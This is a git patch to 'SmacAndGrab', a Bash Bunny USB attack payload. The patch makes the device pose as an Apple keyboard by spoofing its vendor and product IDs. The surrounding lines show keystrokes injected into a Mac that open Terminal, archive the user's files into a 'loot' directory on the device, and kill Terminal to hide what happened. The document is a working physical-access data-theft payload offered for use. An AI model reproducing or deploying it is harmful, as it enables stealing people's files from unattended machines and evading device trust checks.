From 6e5aeb2cfa2dd09fadef2631c1a5be470573bf68 Mon Sep 17 00:00:00 2001 From: Alex Flores Date: Mon, 13 Mar 2017 18:57:54 -0400 Subject: [PATCH] mod hid/pid to show as apple keyboard --- payloads/library/SmacAndGrab/payload.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/payloads/library/SmacAndGrab/payload.txt b/payloads/library/SmacAndGrab/payload.txt index 2d8bb5c5..11c7384b 100644 --- a/payloads/library/SmacAndGrab/payload.txt +++ b/payloads/library/SmacAndGrab/payload.txt @@ -11,7 +11,7 @@ # Green...............Finished LED G R 500 -ATTACKMODE HID STORAGE +ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E # make the loot directory on the BashBunny mkdir -p /root/udisk/loot/sMacAndGrab @@ -34,8 +34,8 @@ QUACK DELAY 1000 QUACK STRING terminal QUACK ENTER QUACK DELAY 4000 +# the more files in $files to copy, the longer tar will take to compress # one-liner because we want the move command to wait for tar to finish -# tar take n time, depending on the contents of $files_to_copy QUACK STRING tar -cf \$USER.tar.gz ${files_to_copy[*]}\; mv \$USER.tar.gz $lootdir\; killall Terminal QUACK ENTER